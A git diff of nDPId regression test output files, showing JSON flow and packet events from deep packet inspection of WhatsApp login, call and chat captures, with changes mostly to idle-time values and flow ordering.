00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
@@ -339,12 +335,16 @@ 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} 
00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","packets-captured":1253,"packets-processed":1251,"total-skipped-flows":0,"total-l4-data-len":132660,"total-not-detected-flows":0,"total-guessed-flows":22,"total-detected-flows":35,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":348,"global_ts_msec":1432582361929} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1253/1251 diff --git a/test/results/whatsapp_login_chat.pcap.out b/test/results/whatsapp_login_chat.pcap.out index d7834017b..37303119a 100644 --- a/test/results/whatsapp_login_chat.pcap.out +++ b/test/results/whatsapp_login_chat.pcap.out 
@@ -8,17 +8,17 @@ 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432582379571,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582379571,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+Me8AAEARwurAqAIBwKgCBAA18QEAqrdkrIuBgAABAAgAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAAiQABLitsy\/ADAABAAEAAAIkAASeVTpnwAwAAQABAAACJAAEuK2zLMAMAAEAAQAAAiQABLitsyPADAABAAEAAAIkAARsqLDGwAwAAQABAAACJAAEnlU6NMAMAAEAAQAAAiQABJ5VOg\/ADAABAAEAAAIkAASeVTol"} 
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379591,"flow_last_seen":1432582379591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582379591,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582379591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582379591,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAjylAAEAGEH7AqAIEnlU6D8A2FGYksXJ9AAAAALAC\/\/+BgwAAAgQFtAEDAwQBAQgKLfyAogAAAAAEAgAA"} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582379745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582379745,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8XOEAADUGjcqeVToPwKgCBBRmwDYfJVHSJLFyfqAS\/\/8RNgAAAgQFrAEDAwkEAggKXZ2yry38gKI="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582379848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582379848,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0bGhAAEAGM0vAqAIEnlU6D8A2FGYksXJ+HyVR04AQIFgeowAAAQEICi38gaNdnbKv"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXIltFAAEAGh5\/AqAIEEa1CZsA1Abt+clmMpMYxPVAQQABXnAAAFwMDB3i+HiPgShCayKsiCSxppt+UVMG6sNLf32XwXp\/5y1\/Gi93F3S41DWF8\/kCqCE3bWkUsOQ\/D44TQ+2n51pbyMSPLw0aW5BBc1KN+NXFB6c0\/EvLUkiCkXMNnoBikvRGoWqnT3MsBLR3ifxEfJkx0KA0FgI9JutlWbXDDUTzCRBEZTuRft2ygLhc453pAbiPG9v0WPMDLHXiyCBIVg\/B5dK4qKFD6E2UMKFMhu4mZRR2j\/6qxWlXTvDrMGoz+8Qo7VA74VXDOmIIqRacL+CmsjHCFgzIlevE9HbzQStt3waOocRqfRvIAnyjErcnsgCXougYuTv7e+MXADNmAZBilIIoi3Uil6da7kvrxaXQ4p+uZdx7Gy5yoHJv8xUlpNlf\/6TnuDJ0Sr34mxp2ViDhiTjdQbwAa3oxSYIriERZCD+iy2XBPrLEva6gxIYSFoMA1nMvNEDvwHAwVpPX12H1IQq6zqjIg+g2T3TBZpcZ71NLHtrlkBg9o5NZd7LL0MCoUc5LF5gFQhEphIEtekSiwBF\/vWaUkYpAxP7LvgNiCoLKAfwM9RyhmY\/groOK8zq86A8Z\/A5kmVimU2YKg3RBFJIj4fY5ZjJv5w7NZlJ5I4tkbJJp4AoKwuThn7szdjjoI\/Gz6k3Cz8YZmXMOwDviwyDpLeaUvIrJPOa1ciNsy0vHmM7ukkMbC8Ej95C27cDvULH7dL6T0XGOtlAh\/1i8BfnuG9hN4cxa\/b+5gAAhOFw1eAAyMGcUy23P+89rorZ3KMrek+vuNcICgkwnazh1Z5AFtIzlWlMfxbaxy\/+pJoR3DnO0EuyOOHz4IdCogPPXsieGyIHTaGzpebRd3ow8OikTIF2RiPLnkFeI25KqwWpGL6weTaFVmxqKuafYQNbLXqeb1mf\/D
lBl7xTHdJ\/K7sh+ashtIQDjtOnXuANeb1sDwla5nv+DnrsBoezknxm9kI8r\/CTGWQN\/tTHUBQ3JnQu2sU3BgKQv67idjs6\/xEGKN0fSceO\/OmdSiRN4eY5AKeqGiRb0iQcOp0eoO0nHkil+B5uKPiznWHrrsTIB9dEBiXQpdbXNu0tyB5osy9qzKMkf\/o9uJ+QSQ5cIo7DjRzFZnpJOkCxvvXWU+FpzDhZxIpMTrOA0QqAGTa21N2fhnR7KTBe68GBzD362LyujtxvtI68Y+e4qwU8QRYv94bSptDA1mC5d7hLaair0kLj5FJuw9fQYw56jdCBuIztl42Q9ip+eJzWCXzcqrMuxyZhMkusneUAU213bxe7LIroTzopLTvDr1KXzVypQq1ZP5NCiggcKfqeKZidfD+aXqLGRh7olUlGpaHuqy1maaxpidAIrK\/rniCznE3Y8bsAPAq11XlkH+mjEIj4B5Et\/0lF+xCPP+z5E9ZGqKuPoSIYCKQzbemYTMMkhnWOl6BB5kOc48mQHXcM\/HEeMKQ4qb33pU8bbK3Mr9Vb0pzxFXpDLLr1AV4WOOsDEdqZRvrHbAGGit7Ox3YtWydJ61deheU2gY0jifGxvWb6TKpitF7KENLzDKe6R1+jkekRnLVGAoiZ6cidxCTodgPGJaODRed4KQauNt6lzH+E+PJp48Tc7z95H2uvpzfMxaqZdwBSkB4v4ScjVowzkErkvUxVQNOveEwAJQDuk\/MJnrSUEivzWnCcp3a+GPlrKE2YjKybAPuXK8NmegG3utqM2DgTsUTgCNR+3ESE1g9tqjPpb6WMGMIfSBz2fb5tlr8mBN4CEu0H72FkFaOVAQvrDFdSC9uWsLI+9xr\/qifTPscJiK47gZwd7xJ1+AvgSKzzkjQwgSwyGtffBvX0O0GlFuSMAxYjLubFvVAvKhF6gkJ9oPlwZ9pkLOs5hTGXcjvBfkdt78lFxJQl3eijMQRas5LDn3A9Tn53tCW5oXAuOYXz4b"} 
-01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":531,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":531,"pkt_l4_len":497,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIFAqxAAEAGH4jAqAIEEa1CZsA1Abt+cl8spMYxPVAYQAAK4wAA+zXxkGmxqmlJcwlR7TpHpRtDDy9iaRt9w+hOFsERXuy8gwV22TTGXYqWLP3aSg0FRpPNh6b2JxTA9OSkJEk04NCfWqJRauLthWRuA7XoVn8i6Smk+coAOa3u15Yq91KVTfK0Likn42RkhoMCTU67u6i6Y4GW7d7uWiM6L3uLokbbGTmGs29u3afEGnNWZwLcuyp6rGxmPmWxvxgkiNCzEIsj5+jDbrTqLXDyyF322ZG7ztnAr92I1EUwbaElkdT9P28rYnazLdDX3NtrMNZoVpJg+JtJ\/7kZqQ2Wqzmg\/a3xXi4EVY3r6CTewAoUnubR3Qb8d8SxZWO8dXB980UXO8ObJWaEL5I20Sp30w7kYXi8hv4VgTLwR\/5GH+diyQKZuXNNplXdUL9qR0BnzfYHcTgjG28TOg74dTk611xDBeVR4Itg6rhO4EXCbpfiRmK6bb3CXGkaTCMHxUnezI+xc2Wog+XxCXrGyOiN2uGEyOBaMLxsAdU\/WfMK5Hg2kk6QV97kZZAhmz0GEeQIuwbiHtXsFgOmiLHGkBFU3uvrL2U0AIsy\/dg28ProYM\/UVKotXUmjaEkwo4XPHqyzoqhSMSd8fGbpRTWD+Jj7SG1OLSQLZ6OzyLhulPpesWWw"} 
-01222{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":610,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":610,"pkt_l4_len":576,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAJULUhAAEAG9JzAqAIEEa1CZsA1Abt+cmEJpMYxPVAYQAAkaQAAFwMDAifRP6n1iN3uB\/Uhy6B3MN22nTeVXJRqDhAyLGWagzjVPV67eGMiWlDpxIYk9ZRXb8ENyJMklAVg5qQxAfredM796d1woE5CM\/dDlnC9hhfBLqlOMT0Sc23vnR6S0CtE+vcI2IEc50YYFIr8cCuBcLPUtehQ+6FiIBzPUNdC8gBpCK0l8ehCaB6UsJ+9Lz+rqI7LymD80O7JD9GQGlEzf0ROrOYPwKN9oloslBYMUuNcVtuTSnZlQf6clnYgiVqjkPEIWZnj1\/SzJxC0XzXDZTCazzjZUphrvHsUFVKI\/iQfQLn2Pm20z\/bY+umTrESbc\/Rb\/jTAxKkWPlTguW5QNPTgHe+8CLbu8GlNIUhp6XnzV0lotZMlMuaBJakvd6GmWA8qWeiSGeNI8Nxabsp54T+pQf+cFTWMVSzn894mO+DZZ3gtq32z87kDjYiMhE2jHBbOrnjFvxmtQtZu7lyboSLDYh55cOzJECLrbK8MSRuDtHOP5G6iepYtPwv3WMGLCV+hTD9hULIUKlQnW8NxmNPf6x7m2WXh+T5KFO1k2GNZTSM8sWZLLJiGPB3r5p1nS3ObF9UaRS1rU\/+0JK5FT6PVQl\/T6rcJ66cGodbOS0a03YtqhfdlphEfqQSNy4IBPyE7+TYhqlI5kH8vw+oFYBVtxUinzFEEO03Tz6ey1LN8P\/4vb9rv1pyNfFxaNarK\/6\/1noAhKaU7nGWU\/L6Er+GI\/BOXYTn7Ng=="} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 